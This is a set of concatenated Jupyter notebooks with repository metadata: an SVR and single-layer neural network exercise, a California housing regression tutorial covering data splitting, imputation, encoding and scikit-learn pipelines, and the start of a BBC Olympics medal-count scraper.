"epsilon = 1\nbw = cp.Variable(X_lp.shape[1]) # for b and w parameters in SVR. bw[0]=b, bw[1]=w\ncost = 1 / 2 * bw[1] ** 2\nobj = cp.Minimize(cost)\nconstraints = [\n y_lp <= X_lp * bw + epsilon,\n -y_lp <= -(X_lp * bw) + epsilon]\nprob = cp.Problem(obj, constraints)\nprob.solve(solver=cp.CPLEX, verbose=False)\n# print(\"status:\", prob.status)\nprint(\"\\nSVR result:\")\nprint(\"The estimate of w is:\", bw.value[1],\n \"\\nThe estimate of b is:\", bw.value[0], )\n\n# Plot the SVR fit\nupper = X_lp[:, 1] * bw.value[1] + bw.value[0] + epsilon # upper bound of the margin\nlower = X_lp[:, 1] * bw.value[1] + bw.value[0] - epsilon # lower bound of the margin\n\nx = np.linspace(.5, 6, 100)\ny = bw.value[1] * x + bw.value[0]\nplt.plot(x, y, c='red', label='y = wx + b')\nx = [[min(X_lp[:, 1]), max(X_lp[:, 1])]]\ny = [[min(lower), max(lower)]]\nfor i in range(len(x)):\n plt.plot(x[i], y[i], '--g')\ny = [[min(upper), max(upper)]]\nfor i in range(len(x)):\n plt.plot(x[i], y[i], '--g', label='margin')\nplt.title('Fitted line using SVR')\nplt.legend(loc='upper left')\nplt.scatter(x=ar[1], y=ar[2], c='blue')\nplt.axis('scaled')\nplt.show()",
"\nSVR result:\nThe estimate of w is: 1.0 \nThe estimate of b is: -0.0\n"
]
],
[
[
"### Single-layer NN",
"_____no_output_____"
],
[
"For single-layer NN, I use the same structure in Q4 ***with the bias set to 0***. As discussed in Q7, I set the learning rate=0.001 and the algorithm converge at iteration 30. The estimated $w$ is 0.2. The fitted line with the training sample points are plotted.",
"_____no_output_____"
]
],
[
[
"def single_layer_NN(lr, w, maxiteration, bias=1):\n \"\"\"lr - learning rate\\n\n w - initial value of w\\n\n maxiteration - define # of max iteration\\n\n bias - default is 1 \"\"\"\n E0 = sum(0.5 * np.power((y_lp - 5 * (w * X_lp[:, 1] + bias)), 2)) # initialize Loss, before 1st iteration\n for i in range(maxiteration):\n if i > 0: # Starting 2nd iteration, E1 value give to E0\n E0 = E1 # Loss before iteration\n print(\"Iteration=\", i, \",\", \"Loss value=\", E0)\n gradient = np.mean((5 * (w * X_lp[:, 1] + bias) - y_lp) * 5 * X_lp[:, 1]) # calculate gradient\n step = gradient * lr # calculate step size\n w = w - step # refresh the weight\n E1 = sum(0.5 * np.power((5 * (w * X_lp[:, 1] + bias) - y_lp), 2)) # Loss after iteration\n a = 5 * (w * X_lp[:, 1] + 1) # the refreshed output\n\n if abs(E0 - E1) <= 0.0001:\n print('Break out of the loop and end at Iteration=', i,\n '\\nThe value of loss is:', E1,\n '\\nThe value of w is:', w)\n break\n return w, a, gradient\n\nw, a, gradient = single_layer_NN(lr=0.001, w=10, maxiteration=40, bias=0)\n\n# plot the NN fit\nx = np.linspace(0, 10, 100)\ny = 5 * w * x + 0\nplt.close('all')\nplt.plot(x, y, c='red', label='y = f(wx + b)')\nplt.title('Fitted line using single-layer NN')\nplt.legend(loc='upper left')\nplt.scatter(x=ar[1], y=ar[2], c='blue')\nplt.axis('scaled')\nplt.show()",
"Iteration= 0 , Loss value= 140460.5\nIteration= 1 , Loss value= 70309.380040625\nIteration= 2 , Loss value= 35194.79850046009\nIteration= 3 , Loss value= 17617.975244395926\nIteration= 4 , Loss value= 8819.78650842766\nIteration= 5 , Loss value= 4415.798147959143\nIteration= 6 , Loss value= 2211.3542491993735\nIteration= 7 , Loss value= 1107.9060779008041\nIteration= 8 , Loss value= 555.5681992062342\nIteration= 9 , Loss value= 279.0920219139255\nIteration= 10 , Loss value= 140.70014339415238\nIteration= 11 , Loss value= 71.42722365183917\nIteration= 12 , Loss value= 36.75223071907594\nIteration= 13 , Loss value= 19.39544628787546\nIteration= 14 , Loss value= 10.707399360935359\nIteration= 15 , Loss value= 6.358543171362202\nIteration= 16 , Loss value= 4.181696025320171\nIteration= 17 , Loss value= 3.092061581074171\nIteration= 18 , Loss value= 2.546638249791558\nIteration= 19 , Loss value= 2.273623192422225\nIteration= 20 , Loss value= 2.136963799111898\nIteration= 21 , Loss value= 2.0685580856692054\nIteration= 22 , Loss value= 2.0343171782697556\nIteration= 23 , Loss value= 2.017177678065291\nIteration= 24 , Loss value= 2.008598394116069\nIteration= 25 , Loss value= 2.0043039799147615\nIteration= 26 , Loss value= 2.0021543840462086\nIteration= 27 , Loss value= 2.00107839039923\nIteration= 28 , Loss value= 2.0005397950542743\nIteration= 29 , Loss value= 2.000270197788136\nIteration= 30 , Loss value= 2.0001352491915876\nBreak out of the loop and end at Iteration= 30 \nThe value of loss is: 2.000067699828157 \nThe value of w is: 0.20021515222701822\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
]
] |
cb53c8398a007ae0af676eaa581f885a8aab665e | 605,387 | ipynb | Jupyter Notebook | Housing Predi/house_pre.ipynb | abideen305/myML-model | fceb79b51819124c5499647930bb717583976613 | [
"MIT"
] | 1 | 2020-07-03T00:17:50.000Z | 2020-07-03T00:17:50.000Z | Housing Predi/house_pre.ipynb | abideen305/myML-model | fceb79b51819124c5499647930bb717583976613 | [
"MIT"
] | null | null | null | Housing Predi/house_pre.ipynb | abideen305/myML-model | fceb79b51819124c5499647930bb717583976613 | [
"MIT"
] | 1 | 2020-07-11T21:26:10.000Z | 2020-07-11T21:26:10.000Z | 232.841154 | 305,380 | 0.89996 | [
[
[
"# fetching data online\n\nimport os\nimport tarfile\nfrom six.moves import urllib",
"_____no_output_____"
],
[
"DOWNLOAD_ROOT = \"https://raw.githubusercontent.com/ageron/handson-ml2/master/\"\nHOUSING_PATH = os.path.join(\"datasets\", \"housing\")\nHOUSING_URL = DOWNLOAD_ROOT + \"datasets/housing/housing.tgz\"\ndef fetch_housing_data(housing_url=HOUSING_URL, housing_path=HOUSING_PATH):\n if not os.path.isdir(housing_path):\n os.makedirs(housing_path)\n tgz_path = os.path.join(housing_path, \"housing.tgz\")\n urllib.request.urlretrieve(housing_url, tgz_path)\n housing_tgz = tarfile.open(tgz_path)\n housing_tgz.extractall(path=housing_path)\n housing_tgz.close()",
"_____no_output_____"
],
[
"fetch_housing_data()",
"_____no_output_____"
],
[
"import pandas as pd\n\ndef load_housing_data(housing_path=HOUSING_PATH):\n csv_path = os.path.join(housing_path, \"housing.csv\")\n return pd.read_csv(csv_path)\n ",
"_____no_output_____"
],
[
"housing = load_housing_data()\nhousing.head()",
"_____no_output_____"
],
[
"housing.info()",
"<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 20640 entries, 0 to 20639\nData columns (total 10 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 longitude 20640 non-null float64\n 1 latitude 20640 non-null float64\n 2 housing_median_age 20640 non-null float64\n 3 total_rooms 20640 non-null float64\n 4 total_bedrooms 20433 non-null float64\n 5 population 20640 non-null float64\n 6 households 20640 non-null float64\n 7 median_income 20640 non-null float64\n 8 median_house_value 20640 non-null float64\n 9 ocean_proximity 20640 non-null object \ndtypes: float64(9), object(1)\nmemory usage: 1.6+ MB\n"
],
[
"housing[\"ocean_proximity\"].value_counts()",
"_____no_output_____"
],
[
"housing.describe()",
"_____no_output_____"
],
[
"%matplotlib inline\nimport matplotlib.pyplot as plt",
"_____no_output_____"
],
[
"housing.hist(bins=50, figsize=(20,15))\nplt.show()",
"_____no_output_____"
],
[
"import numpy as np\ndef split_train_test (data, test_ratio):\n shuffled_indices = np.random.permutation(len(data))\n test_set_size = int(len(data) * test_ratio)\n test_indices = shuffled_indices[:test_set_size]\n train_indices = shuffled_indices[test_set_size:]\n return data.iloc[train_indices], data.iloc[test_indices]",
"_____no_output_____"
],
[
"train_set, test_set = split_train_test(housing, 0.2)",
"_____no_output_____"
],
[
"print(len(train_set))\nprint(len(test_set))",
"16512\n4128\n"
],
[
"from zlib import crc32\ndef test_set_check(identifier, test_ratio):\n return crc32(np.int64(identifier)) & 0xffffffff < test_ratio * 2**32\ndef split_train_test_by_id(data, test_ratio, id_column):\n ids = data[id_column]\n in_test_set = ids.apply(lambda id_: test_set_check(id_, test_ratio))\n return data.loc[~in_test_set], data.loc[in_test_set]\n",
"_____no_output_____"
],
[
"housing_with_id = housing.reset_index() # adds an `index` column\ntrain_set, test_set = split_train_test_by_id(housing_with_id, 0.2, \"index\")",
"_____no_output_____"
],
[
"housing_with_id[\"id\"] = housing[\"longitude\"] * 1000 + housing[\"latitude\"]\ntrain_set, test_set = split_train_test_by_id(housing_with_id, 0.2, \"id\")",
"_____no_output_____"
],
[
"#splitting using sciktlearn\nfrom sklearn.model_selection import train_test_split\ntrain_set, test_set = train_test_split(housing, test_size=0.2, random_state=42)",
"_____no_output_____"
],
[
"housing[\"income_cat\"] = pd.cut(housing[\"median_income\"],\n bins=[0., 1.5, 3.0, 4.5, 6., np.inf],\n labels=[1, 2, 3, 4, 5])",
"_____no_output_____"
],
[
"housing['income_cat'].hist()\nplt.show()",
"_____no_output_____"
],
[
"#stratifield splitting\nfrom sklearn.model_selection import StratifiedShuffleSplit\nsplit = StratifiedShuffleSplit(n_splits=1, test_size=0.2, random_state=42)\nfor train_index, test_index in split.split(housing, housing[\"income_cat\"]):\n strat_train_set = housing.loc[train_index]\n strat_test_set = housing.loc[test_index]",
"_____no_output_____"
],
[
"strat_test_set[\"income_cat\"].value_counts() / len(strat_test_set)",
"_____no_output_____"
],
[
"for set_ in (strat_train_set, strat_test_set):\n set_.drop(\"income_cat\", axis=1, inplace=True)",
"_____no_output_____"
],
[
"housing = strat_train_set.copy()",
"_____no_output_____"
],
[
"housing.plot(kind=\"scatter\", alpha =0.1, x=\"longitude\", y=\"latitude\")\nplt.show()",
"_____no_output_____"
],
[
"corr_matrix = housing.corr()\ncorr_matrix",
"_____no_output_____"
],
[
"corr_matrix['median_house_value'].sort_values(ascending=False)",
"_____no_output_____"
],
[
"plt.subplot()\nplt.plot(corr_matrix['median_house_value'], color ='red')\nplt.show()",
"_____no_output_____"
],
[
"#using pandas's scatter matrix to check for correlation\nfrom pandas.plotting import scatter_matrix\n",
"_____no_output_____"
],
[
"attributes = [\"median_house_value\", \"median_income\", \"total_rooms\", \"housing_median_age\"]\nscatter_matrix(housing[attributes], figsize=(12,8))\nplt.show()",
"_____no_output_____"
],
[
"housing.plot(kind='scatter', x='median_income', y=\"median_house_value\", alpha=0.1)\n\nplt.show()",
"_____no_output_____"
],
[
"housing[\"rooms_per_household\"] = housing[\"total_rooms\"] / housing[\"households\"]\nhousing[\"population_per_household\"] = housing[\"population\"] / housing[\"households\"]\nhousing[\"bedrooms_per_room\"] = housing[\"total_bedrooms\"] / housing[\"total_rooms\"]",
"_____no_output_____"
],
[
"corr_matrix = housing.corr()",
"_____no_output_____"
],
[
"corr_matrix[\"median_house_value\"].sort_values(ascending = False)",
"_____no_output_____"
],
[
"#Prepare the Data for Machine Learning Algorithms",
"_____no_output_____"
],
[
"housing = strat_train_set.drop(\"median_house_value\", axis=1)\nhousing_labels = strat_train_set[\"median_house_value\"].copy()\n",
"_____no_output_____"
],
[
"median = housing[\"total_bedrooms\"].median()",
"_____no_output_____"
]
],
[
[
"## Data Cleaning\n\n- Most Machine Learning algorithms cannot work with missing features, so let’s create a few functions to take care of them. \nYou noticed earlier that the total_bedrooms\nattribute has some missing values, so let’s fix this. You have three options:\n- Get rid of the corresponding districts.\n- Get rid of the whole attribute.\n- Set the values to some value (zero, the mean, the median, etc.).\nYou can accomplish these easily using DataFrame’s dropna(), drop(), and fillna()\nmethods.\n\n\nIf you choose option 3, you should compute the median value on the training set, and\nuse it to fill the missing values in the training set, but also don’t forget to save the\nmedian value that you have computed. You will need it later to replace missing values\nin the test set when you want to evaluate your system, and also once the system goes\nlive to replace missing values in new data.\nScikit-Learn provides a handy class to take care of missing values: SimpleImputer.\nHere is how to use it. First, you need to create a SimpleImputer instance, specifying\nthat you want to replace each attribute’s missing values with the median of that\nattribute.\n\nHowever, I won't be dealing with sklearn now because we are yet to treat the library\n",
"_____no_output_____"
]
],
[
[
"housing.dropna(subset=[\"total_bedrooms\"]) # option 1\nhousing.drop(\"total_bedrooms\", axis=1) # option 2\nmedian = housing[\"total_bedrooms\"].median() # option 3\nhousing[\"total_bedrooms\"].fillna(median, inplace=True)",
"_____no_output_____"
],
[
"from sklearn.impute import SimpleImputer",
"_____no_output_____"
],
[
"housing[\"total_bedrooms\"].fillna(median, inplace=True)",
"_____no_output_____"
],
[
"imputer = SimpleImputer(strategy=\"median\")\n",
"_____no_output_____"
],
[
"#I made mistake in this code. I wrote simpler instead of simple\n\n# imputer = SimplerImputer(strategy= \"median\")",
"_____no_output_____"
],
[
"#Since the median can only be computed on numerical attributes, we need to create a\n#copy of the data without the text attribute ocean_proximity:\nhousing_num = housing.drop(\"ocean_proximity\", axis=1)",
"_____no_output_____"
],
[
"print(imputer.fit(housing_num))",
"SimpleImputer(strategy='median')\n"
],
[
"imputer",
"_____no_output_____"
],
[
"#I could have just treat only total_bedrooms attribute that has missing values rather than everything. But we can't be so sure of tomorrow's data\n#so let's apply it to everywhere\n\nimputer.statistics_",
"_____no_output_____"
],
[
"housing_num.median().values",
"_____no_output_____"
],
[
"#transform the values\n\nX = imputer.transform(housing_num)",
"_____no_output_____"
],
[
"housing_tr = pd.DataFrame(X, columns=housing_num.columns)",
"_____no_output_____"
],
[
"housing_tr",
"_____no_output_____"
],
[
"#fit() and transform() what about fit_transform()?\n\n#fit_transform() is saying fit then transform. Fit_transform() method sometimes run faster.",
"_____no_output_____"
]
],
[
[
"## Handling Text and Categorical Attributes\n",
"_____no_output_____"
]
],
[
[
"# let's us treat ocean_proximity attributes ",
"_____no_output_____"
],
[
"housing_cat = housing[[\"ocean_proximity\"]]",
"_____no_output_____"
],
[
"housing_cat.head(15)",
"_____no_output_____"
],
[
"#check for the value counts\nhousing_cat.value_counts(sort=True)",
"_____no_output_____"
]
],
[
[
"# to convert text attribute to number because machine learning algorithms tends to work better with numbers, we use\n\n- oneht encoding\n- Scikit-Learn’s OrdinalEncoder class\n- etc",
"_____no_output_____"
]
],
[
[
"from sklearn.preprocessing import OrdinalEncoder",
"_____no_output_____"
],
[
"ordinal_encoder = OrdinalEncoder()",
"_____no_output_____"
],
[
"ordinal_encoder",
"_____no_output_____"
],
[
"housing_cat_encoded = ordinal_encoder.fit_transform(housing_cat)",
"_____no_output_____"
],
[
"housing_cat_encoded",
"_____no_output_____"
],
[
"ordinal_encoder.categories_",
"_____no_output_____"
],
[
"_",
"_____no_output_____"
]
],
[
[
"## Underscore (_) in Python\nDifficulty Level : Medium\nLast Updated : 22 Nov, 2020\nFollowing are different places where _ is used in Python:\n\nSingle Underscore:\nIn Interpreter\nAfter a name\nBefore a name\nDouble Underscore:\n__leading_double_underscore\n__before_after__\nSingle Underscore\n\nIn Interpreter:\n_ returns the value of last executed expression value in Python Prompt/Interpreter\n\nFor ignoring values:\nMultiple time we do not want return values at that time assign those values to Underscore. It used as throwaway variable.\n\n# Ignore a value of specific location/index\nfor _ in range(10)\n print (\"Test\")\n \n# Ignore a value when unpacking\na,b,_,_ = my_method(var1)\nAfter a name\nPython has their by default keywords which we can not use as the variable name. To avoid such conflict between python keyword and variable we use underscore after name\n\n- snake_case vs camelCase vs PascalCase\n",
"_____no_output_____"
]
],
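[
[
"A small runnable illustration of the throwaway underscore described above (the loop and the unpacked tuple are arbitrary examples added for demonstration):",
"_____no_output_____"
]
],
[
[
"# Throwaway variable in a loop: the index itself is not needed\nfor _ in range(3):\n    print(\"Test\")\n\n# Ignore selected values when unpacking\na, b, _, _ = (1, 2, 3, 4)\nprint(a, b)",
"_____no_output_____"
]
],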
[
[
"# One hot encoding\n\n#Our ML algorithm from previous result, 0.,1.,..4. can think 0.1 and 0.2 are close\n# to solve this problem, we do dummy variable. To achieve that, scikit- learn provides us with One hot encoding\n ",
"_____no_output_____"
],
[
"from sklearn.preprocessing import OneHotEncoder",
"_____no_output_____"
],
[
"cat_encoder = OneHotEncoder()",
"_____no_output_____"
],
[
"housing_cat_1hot = cat_encoder.fit_transform(housing_cat)",
"_____no_output_____"
],
[
"housing_cat_1hot",
"_____no_output_____"
],
[
"# Using up tons of memory mostly to store zeros\n# would be very wasteful, so instead a sparse matrix only stores the location of the non‐\n# 70 | Chapter 2: End-to-End Machine Learning Project\n# 21 See SciPy’s documentation for more details.\n# zero elements. You can use it mostly like a normal 2D array,21 but if you really want to\n# convert it to a (dense) NumPy array, just call the toarray() method:\n",
"_____no_output_____"
],
[
"# get list of categories\n\nhousing_cat_1hot.toarray()",
"_____no_output_____"
]
],
[
[
"# Feature Scaling\nOne of the most important transformations you need to apply to your data is feature\nscaling. With few exceptions, Machine Learning algorithms don’t perform well when\nthe input numerical attributes have very different scales. This is the case for the hous‐\ning data: the total number of rooms ranges from about 6 to 39,320, while the median\nincomes only range from 0 to 15. Note that scaling the target values is generally not\nrequired.\nThere are two common ways to get all attributes to have the same scale: min-max\nscaling and standardization.\nMin-max scaling (many people call this normalization) is quite simple: values are\nshifted and rescaled so that they end up ranging from 0 to 1.# ",
"_____no_output_____"
]
],
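[
[
"To make the difference concrete, here is a quick illustration (a small sketch added for comparison, assuming the housing DataFrame defined above is still in scope) of min-max scaling versus standardization on the median_income attribute:",
"_____no_output_____"
]
],
[
[
"from sklearn.preprocessing import MinMaxScaler, StandardScaler\n\n# Compare the two scalers on a single attribute\nincome = housing[[\"median_income\"]].values\nincome_minmax = MinMaxScaler().fit_transform(income)\nincome_std = StandardScaler().fit_transform(income)\nprint(\"original min/max:\", income.min(), income.max())\nprint(\"min-max scaled min/max:\", income_minmax.min(), income_minmax.max())\nprint(\"standardized mean/std:\", round(income_std.mean(), 3), round(income_std.std(), 3))",
"_____no_output_____"
]
],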
[
[
"housing_cat",
"_____no_output_____"
],
[
"housing",
"_____no_output_____"
],
[
"housing.info()",
"<class 'pandas.core.frame.DataFrame'>\nInt64Index: 16512 entries, 17606 to 15775\nData columns (total 9 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 longitude 16512 non-null float64\n 1 latitude 16512 non-null float64\n 2 housing_median_age 16512 non-null float64\n 3 total_rooms 16512 non-null float64\n 4 total_bedrooms 16512 non-null float64\n 5 population 16512 non-null float64\n 6 households 16512 non-null float64\n 7 median_income 16512 non-null float64\n 8 ocean_proximity 16512 non-null object \ndtypes: float64(8), object(1)\nmemory usage: 1.3+ MB\n"
],
[
"housing.info()",
"<class 'pandas.core.frame.DataFrame'>\nInt64Index: 16512 entries, 17606 to 15775\nData columns (total 9 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 longitude 16512 non-null float64\n 1 latitude 16512 non-null float64\n 2 housing_median_age 16512 non-null float64\n 3 total_rooms 16512 non-null float64\n 4 total_bedrooms 16512 non-null float64\n 5 population 16512 non-null float64\n 6 households 16512 non-null float64\n 7 median_income 16512 non-null float64\n 8 ocean_proximity 16512 non-null object \ndtypes: float64(8), object(1)\nmemory usage: 1.3+ MB\n"
],
[
"housing[\"total_rooms\"].value_counts().head(100)",
"_____no_output_____"
],
[
"housing[\"median_income\"].value_counts().head(100)",
"_____no_output_____"
]
],
[
[
"## feature scaling\n\n### types\n- Min-Max /Normalization\n- Standarzation \n\n- Min-Max\nMin-Max scaler: In this we subtract the Minimum from all values – thereby marking a scale from Min to Max. Then divide it by the difference between Min and Max. The result is that our values will go from zero to 1.\n\n- Standardization is quite different: first it subtracts the mean value (so standardized\nvalues always have a zero mean), and then it divides by the standard deviation so that\nthe resulting distribution has unit variance. Unlike min-max scaling, standardization\ndoes not bound values to a specific range, which may be a problem for some algo‐\nrithms (e.g., neural networks often expect an input value ranging from 0 to 1). How‐\never, standardization is much less affected by outliers. For example, suppose a district\nhad a median income equal to 100 (by mistake). Min-max scaling would then crush\nall the other values from 0–15 down to 0–0.15, whereas standardization would not be\nmuch affected. Scikit-Learn provides a transformer called StandardScaler for stand‐\nardization.\n\n\n#### scikit learn handling feature scaling\nScikit-Learn provides a\ntransformer called MinMaxScaler for this. It has a feature_range hyperparameter\nthat lets you change the range if you don’t want 0–1 for some reason.",
"_____no_output_____"
],
[
"# Transformation Pipelines\n",
"_____no_output_____"
]
],
[
[
"pip install scikit-learn==2.0",
"Note: you may need to restart the kernel to use updated packages.\n"
],
[
"from sklearn.preprocessing import StandardScaler\nfrom sklearn.pipeline import Pipeline",
"_____no_output_____"
],
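[
"# NOTE: the pipeline below uses CombinedAttributesAdder, which is not defined anywhere in this notebook.\n# The following is a minimal sketch (an assumption, not the author's original code) so the pipeline can run;\n# the indices assume housing_num's column order: total_rooms=3, total_bedrooms=4, population=5, households=6.\nfrom sklearn.base import BaseEstimator, TransformerMixin\n\nrooms_ix, bedrooms_ix, population_ix, households_ix = 3, 4, 5, 6\n\nclass CombinedAttributesAdder(BaseEstimator, TransformerMixin):\n    def __init__(self, add_bedrooms_per_room=True):\n        self.add_bedrooms_per_room = add_bedrooms_per_room\n    def fit(self, X, y=None):\n        return self  # nothing to learn\n    def transform(self, X):\n        rooms_per_household = X[:, rooms_ix] / X[:, households_ix]\n        population_per_household = X[:, population_ix] / X[:, households_ix]\n        if self.add_bedrooms_per_room:\n            bedrooms_per_room = X[:, bedrooms_ix] / X[:, rooms_ix]\n            return np.c_[X, rooms_per_household, population_per_household, bedrooms_per_room]\n        return np.c_[X, rooms_per_household, population_per_household]",
"_____no_output_____"
],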
[
"num_pipeline = Pipeline([\n ('imputer', SimpleImputer(strategy=\"median\")),\n ('attribs_adder' , CombinedAttributesAdder()),\n ('std_scaler', StandardScaler()),\n])",
"_____no_output_____"
],
[
"from sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import StandardScaler\n\nnum_pipeline = Pipeline([('imputer', SimpleImputer(strategy=\"median\")),\n ('attribs_adder',CombinedAttributesAdder() ),\n ('std_scaler', StandardScaler()),\n ])",
"_____no_output_____"
],
[
"from sklearn.compose import ColumnTransformer\n\n\n\n",
"_____no_output_____"
],
[
"housing_num",
"_____no_output_____"
],
[
"num_attribs = list(housing_num)\ncat_attribs = [\"ocean_proximity\"]",
"_____no_output_____"
],
[
"full_pipeline = ColumnTransformer([\n (\"num\", num_pipeline, num_attribs),\n (\"cat\", OneHotEncoder(), cat_attribs),\n])",
"_____no_output_____"
],
[
"housing_prepared = full_pipeline.fit_transform(housing)",
"_____no_output_____"
],
[
"pip install scikit-learn==2.0",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb53cff7fa953f466ee5e8033d039bed92759fd7 | 7,192 | ipynb | Jupyter Notebook | olympics/.ipynb_checkpoints/2016 Olympics medal count acquisition-checkpoint.ipynb | srcole/qwm | 83eb7d6209f9ef45bd475166039afb15702b2eda | [
"MIT"
] | 13 | 2016-01-27T17:46:29.000Z | 2021-06-07T22:35:15.000Z | olympics/.ipynb_checkpoints/2016 Olympics medal count acquisition-checkpoint.ipynb | srcole/qwm | 83eb7d6209f9ef45bd475166039afb15702b2eda | [
"MIT"
] | null | null | null | olympics/.ipynb_checkpoints/2016 Olympics medal count acquisition-checkpoint.ipynb | srcole/qwm | 83eb7d6209f9ef45bd475166039afb15702b2eda | [
"MIT"
] | 19 | 2016-07-03T18:04:06.000Z | 2021-04-20T06:21:50.000Z | 30.09205 | 410 | 0.506952 | [
[
[
"# 2016 Olympics medal count acquisition\n\nIn this notebook, we acquire the current medal count from the web.",
"_____no_output_____"
],
[
"# 1. List of sports",
"_____no_output_____"
]
],
[
[
"from bs4 import BeautifulSoup\nimport urllib\nr = urllib.urlopen('http://www.bbc.com/sport/olympics/rio-2016/medals/sports').read()\nsoup = BeautifulSoup(r,\"lxml\")\n\nsports_span = soup.findAll(\"span\",{\"class\",\"medals-table-by-sport__sport-name\"})\nsports_names = []\nsports_names_format = []\nfor s in sports_span:\n sports_names_format.append(str(s))\n sports_names.append(str(s).lower().replace(\" \",\"-\")[48:-7])\nprint sports_names",
"['archery', 'athletics', 'badminton', 'basketball', 'boxing', 'canoeing', 'cycling', 'diving', 'equestrian', 'fencing', 'football', 'golf', 'gymnastics', 'handball', 'hockey', 'judo', 'modern-pentathlon', 'rowing', 'rugby-sevens', 'sailing', 'shooting', 'swimming', 'synchronised-swimming', 'table-tennis', 'taekwondo', 'tennis', 'triathlon', 'volleyball', 'water-polo', 'weightlifting', 'wrestling']\n"
]
],
[
[
"# 2. HTMLs for each sport's medal table",
"_____no_output_____"
]
],
[
[
"# Save html for each sport\nhtmls = {}\nfor s in sports_names:\n htmls[s] = urllib.urlopen('http://www.bbc.com/sport/olympics/rio-2016/medals/sports/'+s+'#'+s).read()",
"_____no_output_____"
],
[
"# Find table html for each sport\nthtmls = {}\nfor s in sports_names:\n soupsp = BeautifulSoup(htmls[s],\"lxml\")\n thtmls[s] = soupsp.findAll(\"table\",{\"class\",\"medals-table-by-sport__countries_table\"})",
"_____no_output_____"
]
],
[
[
"# 3. Scrape medals for each country and sport",
"_____no_output_____"
]
],
[
[
"# For every sport, scrape medal data\nimport re\nmedal_names = ['gold','silver','bronze']\nmedals = {}\nsports_countries = {}\nall_countries_format = []\nfor s in sports_names:\n print s\n medals[s] = {}\n h = str(thtmls[s])\n if not thtmls[s]:\n print 'no medals yet'\n else:\n # Find countries of interest\n pattern = r\"<abbr class=\\\"abbr-on medium-abbr-off\\\" title=\\\"\"\n pmatch = re.finditer(pattern, h)\n countries = []\n for i,match in enumerate(pmatch):\n country = h[int(match.end()):int(match.end())+200].rsplit('\"')[0]\n all_countries_format.append(country)\n countries.append(country.lower().replace(\" \",\"-\"))\n sports_countries[s] = countries\n for c in sports_countries[s]:\n if c == 'great-britain-&-n.-ireland':\n ci1 = 'great-britain-and-northern-ireland'\n medals[s][c] = {}\n for m in medal_names:\n pattern = r\"<abbr class=\\\"abbr-on medium-abbr-off\\\" title=\\\".{,800}\" + m + \".{,150}\" + ci1 + \"\\\">\"\n gendermatch = re.finditer(pattern, h)\n for i,match in enumerate(gendermatch):\n medals[s][c][m] = int(h[int(match.end()):int(match.end())+3])\n else:\n ci = c\n medals[s][ci] = {}\n for m in medal_names:\n pattern = r\"<abbr class=\\\"abbr-on medium-abbr-off\\\" title=\\\".{,500}\" + m + \".{,150}\" + ci + \"\\\">\"\n gendermatch = re.finditer(pattern, h)\n for i,match in enumerate(gendermatch):\n medals[s][ci][m] = int(h[int(match.end()):int(match.end())+3])\n print medals[s]",
"_____no_output_____"
]
],
[
[
"# Create dataframe of medals",
"_____no_output_____"
]
],
[
[
"import numpy as np\nall_countries_format = list(np.unique(all_countries_format))\nall_countries_format.remove('Great Britain & N. Ireland')\nall_countries_format.append('Great Britain')\nall_countries_format_list = list(np.unique(all_countries_format))",
"_____no_output_____"
],
[
